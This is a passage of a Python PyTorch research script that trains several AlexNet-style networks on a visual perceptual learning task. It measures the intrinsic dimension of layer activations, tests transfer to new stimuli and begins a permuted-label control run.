x_tensor_transfer = torch.stack(x_tensor_transfer)
y_tensor_transfer = torch.stack(y_tensor_transfer)
print(x_tensor_transfer.shape, y_tensor_transfer.shape)
for model_counter in range(number_model):
print('DNN Model: ' + str(model_counter + 1))
# Read the reference image
file_name_path_ref = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/reference_stimulus.TIFF')
# Define the main reference variable
x_val_ref = np.zeros((224, 224, 3), dtype = np.float32)
x_tensor_ref = []
# Load image
img = Image.open(file_name_path_ref[0]).convert('RGB')
# Resize image
width, height = img.size
new_width = width * 256 // min(img.size)
new_height = height * 256 // min(img.size)
img = img.resize((new_width, new_height), Image.BILINEAR)
# Center crop image
width, height = img.size
startx = width // 2 - (224 // 2)
starty = height // 2 - (224 // 2)
img = np.asarray(img).reshape(height, width, 3)
img = img[starty:starty + 224, startx:startx + 224]
assert img.shape[0] == 224 and img.shape[1] == 224, (img.shape, height, width)
# Save image
x_val_ref[:, :, :] = img[:, :, :]
# Convert image to tensor, then normalize and copy it
x_temp = torch.from_numpy(np.transpose(x_val_ref[:, :, :], (2, 0, 1)))
normalize = transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])
for i in range(len(SF_training) * len(Ori_training)):
x_tensor_ref.append(normalize(x_temp))
x_tensor_ref = torch.stack(x_tensor_ref)
print(x_tensor_ref.shape)
# Select GPU
global device
gpu = 0
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("Use GPU: {} for training".format(gpu))
# Load the PyTorch model
if model_counter == 0:
model = DNNforVPL_1()
elif model_counter == 1:
model = DNNforVPL_2()
elif model_counter == 2:
model = DNNforVPL_3()
elif model_counter == 3:
model = DNNforVPL_4()
elif model_counter == 4:
model = DNNforVPL_5()
model_dict = model.state_dict()
# Filter out unnecessary keys
pretrained_dict_model = {k : v for k, v in pretrained_dict.items() if k in model_dict}
# Overwrite entries in the existing state dict
model_dict.update(pretrained_dict_model)
# Load the new state dict
model.load_state_dict(model_dict)
# Initialize by zero the weights of the fully-connected layer of the model
nn.init.zeros_(model.classifier[0].weight)
nn.init.zeros_(model.classifier[0].bias)
# Set all the parameters of the model to be trainable
for param in model.parameters():
param.requires_grad = True
# Send the model to GPU/CPU
model = model.to(device)
# Model summary
print(model)
cudnn.benchmark = True
### Extracting the activations of convolutional layers of the network per transfer stimulus before training
# The indices of consecutive convolutional layers: (0, 3, 6, 8, 10)
# The sizes of consecutive convolutional layers: (55, 27, 13, 13, 13)
# The positions of central units of consecutive convolutional layers: (27, 13, 6, 6, 6)
# The number of channels of consecutive convolutional layers: (64, 192, 384, 256, 256)
os.mkdir(parent_folder + '/Simulation_' + str(simulation_counter + 1) + '/' + group_training + '/before_training_' + str(model_counter))
saving_folder = parent_folder + '/Simulation_' + str(simulation_counter + 1) + '/' + group_training + '/before_training_' + str(model_counter)
# The target stimuli
feature_sample_artiphysiology = np.zeros((num_sample_artiphysiology, 3), dtype = np.int64)
all_x_sample = np.zeros((num_sample_artiphysiology, 3, 224, 224), dtype = np.float32)
if model_counter == 0:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
elif model_counter == 1:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
elif model_counter == 2:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
all_unit_activity_Conv2d_3 = np.zeros((num_sample_artiphysiology, 384, 13, 13), dtype = np.float32)
elif model_counter == 3:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
all_unit_activity_Conv2d_3 = np.zeros((num_sample_artiphysiology, 384, 13, 13), dtype = np.float32)
all_unit_activity_Conv2d_4 = np.zeros((num_sample_artiphysiology, 256, 13, 13), dtype = np.float32)
elif model_counter == 4:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
all_unit_activity_Conv2d_3 = np.zeros((num_sample_artiphysiology, 384, 13, 13), dtype = np.float32)
all_unit_activity_Conv2d_4 = np.zeros((num_sample_artiphysiology, 256, 13, 13), dtype = np.float32)
all_unit_activity_Conv2d_5 = np.zeros((num_sample_artiphysiology, 256, 13, 13), dtype = np.float32)
for i in range(num_sample_artiphysiology):
feature_sample_artiphysiology[i, :] = [SF_transfer[x_sample_artiphysiology_index[i, 0]], Ori_transfer[x_sample_artiphysiology_index[i, 1]], x_sample_artiphysiology_index[i, 2]]
index = torch.tensor(z_val_transfer[x_sample_artiphysiology_index[i, 0], x_sample_artiphysiology_index[i, 1], x_sample_artiphysiology_index[i, 2]], dtype = torch.long)
x_sample = torch.index_select(x_tensor_transfer, 0, index)
x_sample = x_sample.cuda(gpu)
all_x_sample[i, :] = x_sample.detach().cpu().clone().numpy()
if model_counter == 0:
unit_activity_layer_0 = model.features[0](x_sample)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
elif model_counter == 1:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
elif model_counter == 2:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
elif model_counter == 3:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
elif model_counter == 4:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
unit_activity_layer_9 = model.features[9](unit_activity_layer_8)
unit_activity_layer_10 = model.features[10](unit_activity_layer_9)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_5[i, :] = unit_activity_layer_10[0].detach().cpu().clone().numpy()
# Saving the properties of sample stimuli used for calculating intrinsic dimension
scipy.io.savemat(saving_folder + '/feature_sample_artiphysiology.mat', mdict = {'feature_sample_artiphysiology': feature_sample_artiphysiology})
### Calculating the intrinsic dimension of stimuli
all_x_sample_ID[model_counter][simulation_counter, group_counter] = estimate(squareform(pdist(all_x_sample.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
if model_counter == 0:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
elif model_counter == 1:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
elif model_counter == 2:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0]
elif model_counter == 3:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0]
elif model_counter == 4:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 4, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_5.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 4, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 4, 0]
# Define the main learning parameters
lr = 0.00001
momentum = 0.9
weight_decay = 0.0001
# Define the loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(gpu)
optimizer = torch.optim.SGD(model.parameters(), lr, momentum = momentum, weight_decay = weight_decay)
# Define the main training parameters
start_session = 0
sessions = 1
z_val_shuffle = copy.deepcopy(z_val_training)
for i in range(len(SF_training)):
for j in range(len(Ori_training)):
random.shuffle(z_val_shuffle[i, j, :])
for session in range(start_session, sessions):
# Adjust the learning rate
adjust_learning_rate(optimizer, session, lr)
# Train on a training set
epochs = 180
ID_counter = 0
for epoch in range(epochs):
z_val_shuffle_1D = np.unique(z_val_shuffle[:, :, epoch])
indices = torch.tensor(z_val_shuffle_1D, dtype = torch.long)
x_train = torch.index_select(x_tensor_training, 0, indices)
y_train = torch.index_select(y_tensor_training, 0, indices)
y_train = y_train.squeeze(1)
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Accuracy', ':6.2f')
progress = ProgressMeter(epochs, [batch_time, losses, top1], prefix = ("Training >>> Session: " + str(session) + " Epoch: [{}]").format(epoch))
# Switch to training mode
model.train()
with torch.set_grad_enabled(True):
end = time.time()
x_ref = x_tensor_ref.cuda(gpu)
x_train = x_train.cuda(gpu)
y_train = y_train.cuda(gpu)
# Compute output
output = model(x_train, x_ref)
loss = criterion(output, y_train)
# Measure accuracy and record loss
acc1 = accuracy(output, y_train, topk = 1)
losses.update(loss.item(), x_train.size(0))
top1.update(acc1[0], x_train.size(0))
# Compute gradient and perform SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Save the validation accuracy for plotting
all_simulation_training_accuracy[model_counter][simulation_counter, group_counter, epoch] = acc1[0].item()
# Measure elapsed time
batch_time.update(time.time() - end)
progress.display(epoch)
# Remember the best accuracy
is_best = all_simulation_training_accuracy[model_counter][simulation_counter, group_counter, epoch] >= best_acc1
best_acc1 = max(all_simulation_training_accuracy[model_counter][simulation_counter, group_counter, epoch], best_acc1)
if (epoch + 1) % 10 == 0:
ID_counter = ID_counter + 1
for i in range(num_sample_artiphysiology):
feature_sample_artiphysiology[i, :] = [SF_transfer[x_sample_artiphysiology_index[i, 0]], Ori_transfer[x_sample_artiphysiology_index[i, 1]], x_sample_artiphysiology_index[i, 2]]
index = torch.tensor(z_val_transfer[x_sample_artiphysiology_index[i, 0], x_sample_artiphysiology_index[i, 1], x_sample_artiphysiology_index[i, 2]], dtype = torch.long)
x_sample = torch.index_select(x_tensor_transfer, 0, index)
x_sample = x_sample.cuda(gpu)
if model_counter == 0:
unit_activity_layer_0 = model.features[0](x_sample)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
elif model_counter == 1:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
elif model_counter == 2:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
elif model_counter == 3:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
elif model_counter == 4:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
unit_activity_layer_9 = model.features[9](unit_activity_layer_8)
unit_activity_layer_10 = model.features[10](unit_activity_layer_9)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_5[i, :] = unit_activity_layer_10[0].detach().cpu().clone().numpy()
### Calculating the intrinsic dimension
if model_counter == 0:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 1:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 2:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 3:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 4:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 4, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_5.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
# Save the checkpoint
save_checkpoint({
'session': session + 1,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
}, is_best, group_training, 'DNNforVPL_' + group_training + '.pth.tar')
# Read the reference image
file_name_path_ref = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/reference_stimulus.TIFF')
# Define the main reference variable
x_val_ref = np.zeros((224, 224, 3), dtype = np.float32)
x_tensor_ref = []
# Load image
img = Image.open(file_name_path_ref[0]).convert('RGB')
# Resize image
width, height = img.size
new_width = width * 256 // min(img.size)
new_height = height * 256 // min(img.size)
img = img.resize((new_width, new_height), Image.BILINEAR)
# Center crop image
width, height = img.size
startx = width // 2 - (224 // 2)
starty = height // 2 - (224 // 2)
img = np.asarray(img).reshape(height, width, 3)
img = img[starty:starty + 224, startx:startx + 224]
assert img.shape[0] == 224 and img.shape[1] == 224, (img.shape, height, width)
# Save image
x_val_ref[:, :, :] = img[:, :, :]
# Convert image to tensor, then normalize and copy it
x_temp = torch.from_numpy(np.transpose(x_val_ref[:, :, :], (2, 0, 1)))
normalize = transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])
for i in range(len(SF_transfer) * len(Ori_transfer)):
x_tensor_ref.append(normalize(x_temp))
x_tensor_ref = torch.stack(x_tensor_ref)
print(x_tensor_ref.shape)
# Select GPU
gpu = 0
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("Use GPU: {} for transfer".format(gpu))
# Set all the parameters of the model to be trainable
for param in model.parameters():
param.requires_grad = False
# Send the model to GPU/CPU
model = model.to(device)
# Model summary
print(model)
cudnn.benchmark = True
# Define the main validation parameters
start_session = 0
sessions = 10
for session in range(start_session, sessions):
z_val_shuffle = copy.deepcopy(z_val_transfer)
for j in range(len(SF_transfer)):
for k in range(len(Ori_transfer)):
random.shuffle(z_val_shuffle[j, k, :])
# Evaluate on the validation set
z_val_shuffle_1D = np.unique(z_val_shuffle[:, :, session])
indices = torch.tensor(z_val_shuffle_1D, dtype = torch.long)
x_valid = torch.index_select(x_tensor_transfer, 0, indices)
y_valid = torch.index_select(y_tensor_transfer, 0, indices)
y_valid = y_valid.squeeze(1)
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Accuracy', ':6.2f')
progress = ProgressMeter(1, [batch_time, losses, top1], prefix = ("Transfer >>> Session: " + str(session) + " Epoch: [{}]").format(1))
# Switch to evaluating mode
model.eval()
with torch.no_grad():
end = time.time()
x_ref = x_tensor_ref.cuda(gpu)
x_valid = x_valid.cuda(gpu)
y_valid = y_valid.cuda(gpu)
# Compute output
output = model(x_valid, x_ref)
loss = criterion(output, y_valid)
# Measure accuracy and record loss
acc1 = accuracy(output, y_valid, topk = 1)
losses.update(loss.item(), x_valid.size(0))
top1.update(acc1[0], x_valid.size(0))
# Save the validation accuracy for plotting
all_simulation_transfer_accuracy[model_counter][simulation_counter, group_counter, session - start_session] = acc1[0].item()
# Measure elapsed time
batch_time.update(time.time() - end)
progress.display(1)
# Remember the best accuracy and save checkpoint
is_best = all_simulation_transfer_accuracy[model_counter][simulation_counter, group_counter, session - start_session] >= best_acc1
best_acc1 = max(all_simulation_transfer_accuracy[model_counter][simulation_counter, group_counter, session - start_session], best_acc1)
### Training with Permuted Labels
print('Training with Permuted Labels')
# Read the reference image
file_name_path_ref = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/reference_stimulus.TIFF')
# Define the main reference variable
x_val_ref = np.zeros((224, 224, 3), dtype = np.float32)
x_tensor_ref = []
# Load image
img = Image.open(file_name_path_ref[0]).convert('RGB')
# Resize image
width, height = img.size
new_width = width * 256 // min(img.size)
new_height = height * 256 // min(img.size)
img = img.resize((new_width, new_height), Image.BILINEAR)
# Center crop image
width, height = img.size
startx = width // 2 - (224 // 2)
starty = height // 2 - (224 // 2)
img = np.asarray(img).reshape(height, width, 3)
img = img[starty:starty + 224, startx:startx + 224]
assert img.shape[0] == 224 and img.shape[1] == 224, (img.shape, height, width)
# Save image
x_val_ref[:, :, :] = img[:, :, :]
# Convert image to tensor, then normalize and copy it
x_temp = torch.from_numpy(np.transpose(x_val_ref[:, :, :], (2, 0, 1)))
normalize = transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])
for i in range(len(SF_training) * len(Ori_training)):
x_tensor_ref.append(normalize(x_temp))
x_tensor_ref = torch.stack(x_tensor_ref)
print(x_tensor_ref.shape)
# Load the PyTorch model
if model_counter == 0:
model = DNNforVPL_1()
elif model_counter == 1:
model = DNNforVPL_2()
elif model_counter == 2:
model = DNNforVPL_3()
elif model_counter == 3:
model = DNNforVPL_4()
elif model_counter == 4:
model = DNNforVPL_5()
model_dict = model.state_dict()
# Filter out unnecessary keys
pretrained_dict_model = {k : v for k, v in pretrained_dict.items() if k in model_dict}
# Overwrite entries in the existing state dict
model_dict.update(pretrained_dict_model)
# Load the new state dict
model.load_state_dict(model_dict)
# Initialize by zero the weights of the fully-connected layer of the model
nn.init.zeros_(model.classifier[0].weight)
nn.init.zeros_(model.classifier[0].bias)
# Set all the parameters of the model to be trainable
for param in model.parameters():
param.requires_grad = True
# Send the model to GPU/CPU
model = model.to(device)
cudnn.benchmark = True
# Define the main learning parameters
lr = 0.00001
momentum = 0.9
weight_decay = 0.0001
# Define the loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(gpu)
optimizer = torch.optim.SGD(model.parameters(), lr, momentum = momentum, weight_decay = weight_decay)
# Define the main training parameters
start_session = 0
sessions = 1
# Random permutation of labels
y_tensor_training_permuted = copy.deepcopy(y_tensor_training)
idx = torch.randperm(y_tensor_training_permuted.nelement())
